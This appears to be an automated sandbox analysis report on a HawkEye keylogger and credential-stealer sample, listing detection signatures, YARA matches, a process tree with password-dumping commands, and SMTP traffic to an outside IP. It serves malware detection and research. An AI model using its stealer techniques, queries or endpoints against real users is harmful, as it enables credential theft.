Windows Analysis Report 5.exe

Overview

General Information

Sample Name: 5.exe
Analysis ID: 535767
MD5: 3f332b62eee0970f3189c689d5bd042a
SHA1: f68f7dcc8ffcdd3f93333e711779e8d02db2dfae
SHA256: 7c7983ada08828ea0c0ed5b17b05f8dad5bf6fa44e1a4692c37f18c340e14219
Tags: exe, Hawkeye

Detection

HawkEye MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected MailPassView
Yara detected HawkEye Keylogger
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected MSIL Injector
Detected HawkEye Rat
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Deletes itself after installation
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Installs a global keyboard hook
Writes to foreign memory regions
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Changes the view of files in windows explorer (hidden files and folders)
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Yara detected WebBrowserPassView password recovery tool
Machine Learning detection for dropped file
Tries to steal Instant Messenger accounts or passwords
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Launches processes in debugging mode, may be used to hinder debugging
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
May infect USB drives
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Social media urls found in memory data
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • 5.exe (PID: 1928 cmdline: "C:\Users\user\Desktop\5.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
    • 5.exe (PID: 1060 cmdline: "C:\Users\user\Desktop\5.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
      • Windows Update.exe (PID: 5844 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
        • Windows Update.exe (PID: 6244 cmdline: "C:\Users\user\AppData\Roaming\Windows Update.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
          • dw20.exe (PID: 6640 cmdline: dw20.exe -x -s 2128 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
          • vbc.exe (PID: 6716 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • vbc.exe (PID: 6736 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • WerFault.exe (PID: 7152 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • WerFault.exe (PID: 3456 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • WindowsUpdate.exe (PID: 7036 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdate.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
    • WindowsUpdate.exe (PID: 4320 cmdline: "C:\Users\user\AppData\Roaming\WindowsUpdate.exe" MD5: 3F332B62EEE0970F3189C689D5BD042A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000A.00000002.391527665.00000000075C0000.00000004.00020000.sdmp | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0000000F.00000000.330182095.0000000000400000.00000040.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
0000000A.00000000.357304833.00000000075C0000.00000004.00020000.sdmp | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x8ccca:$key: HawkEyeKeylogger
  • 0x8ef2c:$salt: 099u787978786
  • 0x8d30b:$string1: HawkEye_Keylogger
  • 0x8e15e:$string1: HawkEye_Keylogger
  • 0x8ee8c:$string1: HawkEye_Keylogger
  • 0x8d6f4:$string2: holdermail.txt
  • 0x8d714:$string2: holdermail.txt
  • 0x8d636:$string3: wallet.dat
  • 0x8d64e:$string3: wallet.dat
  • 0x8d664:$string3: wallet.dat
  • 0x8ea50:$string4: Keylog Records
  • 0x8ed68:$string4: Keylog Records
  • 0x8ef84:$string5: do not script -->
  • 0x8ccb2:$string6: \pidloc.txt
  • 0x8cd40:$string7: BSPLIT
  • 0x8cd50:$string7: BSPLIT

Unpacked PEs

Source | Rule | Description | Author | Strings
10.0.Windows Update.exe.4b3fa72.56.raw.unpack | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x1dc00:$key: HawkEyeKeylogger
  • 0x1fe62:$salt: 099u787978786
  • 0x1e241:$string1: HawkEye_Keylogger
  • 0x1f094:$string1: HawkEye_Keylogger
  • 0x1fdc2:$string1: HawkEye_Keylogger
  • 0x1e62a:$string2: holdermail.txt
  • 0x1e64a:$string2: holdermail.txt
  • 0x1e56c:$string3: wallet.dat
  • 0x1e584:$string3: wallet.dat
  • 0x1e59a:$string3: wallet.dat
  • 0x1f986:$string4: Keylog Records
  • 0x1fc9e:$string4: Keylog Records
  • 0x1feba:$string5: do not script -->
  • 0x1dbe8:$string6: \pidloc.txt
  • 0x1dc76:$string7: BSPLIT
  • 0x1dc86:$string7: BSPLIT
10.0.Windows Update.exe.4b3fa72.56.raw.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
10.0.Windows Update.exe.4b3fa72.56.raw.unpack | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
10.0.Windows Update.exe.4b3fa72.56.raw.unpack | Hawkeye | detect HawkEye in memory | JPCERT/CC Incident Response Group
  • 0x1e299:$hawkstr1: HawkEye Keylogger
  • 0x1f0da:$hawkstr1: HawkEye Keylogger
  • 0x1f409:$hawkstr1: HawkEye Keylogger
  • 0x1f564:$hawkstr1: HawkEye Keylogger
  • 0x1f6c7:$hawkstr1: HawkEye Keylogger
  • 0x1f95e:$hawkstr1: HawkEye Keylogger
  • 0x1de27:$hawkstr2: Dear HawkEye Customers!
  • 0x1f45c:$hawkstr2: Dear HawkEye Customers!
  • 0x1f5b3:$hawkstr2: Dear HawkEye Customers!
  • 0x1f71a:$hawkstr2: Dear HawkEye Customers!
  • 0x1df48:$hawkstr3: HawkEye Logger Details:
2.2.5.exe.4a5dc92.9.raw.unpack | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x1dc00:$key: HawkEyeKeylogger
  • 0x1fe62:$salt: 099u787978786
  • 0x1e241:$string1: HawkEye_Keylogger
  • 0x1f094:$string1: HawkEye_Keylogger
  • 0x1fdc2:$string1: HawkEye_Keylogger
  • 0x1e62a:$string2: holdermail.txt
  • 0x1e64a:$string2: holdermail.txt
  • 0x1e56c:$string3: wallet.dat
  • 0x1e584:$string3: wallet.dat
  • 0x1e59a:$string3: wallet.dat
  • 0x1f986:$string4: Keylog Records
  • 0x1fc9e:$string4: Keylog Records
  • 0x1feba:$string5: do not script -->
  • 0x1dbe8:$string6: \pidloc.txt
  • 0x1dc76:$string7: BSPLIT
  • 0x1dc86:$string7: BSPLIT

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          AV Detection:

          Multi AV Scanner detection for submitted file
          Source: 5.exe, Virustotal: Detection: 41%
          Source: 5.exe, ReversingLabs: Detection: 31%
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\nsw2209.tmp\rgsbzeog.dll, ReversingLabs: Detection: 33%
          Source: C:\Users\user\AppData\Local\Temp\nswBB9.tmp\rgsbzeog.dll, ReversingLabs: Detection: 33%
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, ReversingLabs: Detection: 31%
          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, ReversingLabs: Detection: 31%
          Machine Learning detection for sample
          Source: 5.exe, Joe Sandbox ML: detected
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Joe Sandbox ML: detected
          Source: 5.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Users\user\Desktop\5.exe, File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: Binary string: mscorlib.pdbHrs source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.343602667.000000000083F000.00000004.00000020.sdmp
          Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.391527665.00000000075C0000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 5.exe, 00000001.00000003.263698625.0000000014AD0000.00000004.00000001.sdmp, 5.exe, 00000001.00000003.263528153.0000000014940000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.303805285.00000000149D0000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.300117905.0000000014840000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: wntdll.pdb source: 5.exe, 00000001.00000003.263698625.0000000014AD0000.00000004.00000001.sdmp, 5.exe, 00000001.00000003.263528153.0000000014940000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.303805285.00000000149D0000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.300117905.0000000014840000.00000004.00000001.sdmp
          Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 0000000F.00000000.330182095.0000000000400000.00000040.00000001.sdmp, vbc.exe, 0000000F.00000000.329440107.0000000000400000.00000040.00000001.sdmp, vbc.exe, 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp
          Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: mscorlib.pdbAA source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: DDsymbols\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbf source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: oC:\Windows\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: C:\Users\user\Desktop\5.exe, Code function: 1_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
          Source: C:\Users\user\Desktop\5.exe, Code function: 1_2_00405C22 FindFirstFileA,FindClose
          Source: C:\Users\user\Desktop\5.exe, Code function: 1_2_00402630 FindFirstFileA
          Source: C:\Users\user\Desktop\5.exe, Code function: 2_2_00404A29 FindFirstFileExW
          Source: C:\Users\user\Desktop\5.exe, Code function: 2_1_00404A29 FindFirstFileExW
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Code function: 10_2_00404A29 FindFirstFileExW
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Code function: 10_1_00404A29 FindFirstFileExW
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 15_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 16_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe, Code function: 16_2_00407E0E FindFirstFileW,FindNextFileW,FindClose

          Networking:

          May check the online IP address of the machine
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe DNS query: name: whatismyipaddress.com
          Source: global traffic
          HTTP traffic detected: GET / HTTP/1.1
          Host: whatismyipaddress.com
          Connection: Keep-Alive
          Source: global traffic TCP traffic: 192.168.2.5:49765 -> 66.29.159.53:587
          Source: unknown DNS traffic detected: queries for: whatismyipaddress.com
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe Code function: 10_2_00ACB07E recv, 10_2_00ACB07E
          Source: global traffic
          HTTP traffic detected: GET / HTTP/1.1
          Host: whatismyipaddress.com
          Connection: Keep-Alive
          Source: global traffic
          HTTP traffic detected: HTTP/1.1 403 Forbidden
          Date: Tue, 07 Dec 2021 17:17:50 GMT
          Content-Type: text/plain; charset=UTF-8
          Content-Length: 16
          Connection: keep-alive
          X-Frame-Options: SAMEORIGIN
          Referrer-Policy: same-origin
          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
          Expires: Thu, 01 Jan 1970 00:00:01 GMT
          Set-Cookie: __cf_bm=nPhtfuKxYyjGLb17cnOMiRcfLWZkAYSylJ_4tWGJvsI-1638897470-0-AeeMaTLcClFuMkrEhsDP2NYk7ySOraaBkkWDTNnL+xjrSfjvEI6kvtx4e8naTR8mQS8tzHgtAM3Fu23Ag4Cpeiw=; path=/; expires=Tue, 07-Dec-21 17:47:50 GMT; domain=.whatismyipaddress.com; HttpOnly
          Server: cloudflare
          CF-RAY: 6b9f68e8fbc9432d-FRA
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
          Data Ascii: error code: 1020
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... 
          Source: 5.exe, Windows Update.exe, vbc.exe, String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          Yara detected HawkEye Keylogger
          Installs a global keyboard hook
          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exe
          Contains functionality to log keystrokes (.Net Source)
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs, .Net Code: HookKeyboard
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs, .Net Code: HookKeyboard
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs, .Net Code: HookKeyboard
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs, .Net Code: HookKeyboard
          Source: C:\Users\user\Desktop\5.exe, Code function: 1_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPE, Matched rule: Detects HawkEye RAT, Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.4b3fa72.56.raw.unpack, type: UNPACKEDPE, Matched rule: detect HawkEye in memory, Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.415058.16.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.49d0e2d.26.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.41b460.11.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.38c3258.7.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.0.5.exe.41b460.14.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4a90000.12.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.2.Windows Update.exe.4a26c92.9.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.2.5.exe.4b29c0d.17.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 6.2.Windows Update.exe.147a0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 2.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
          Source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
          Source: 10.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
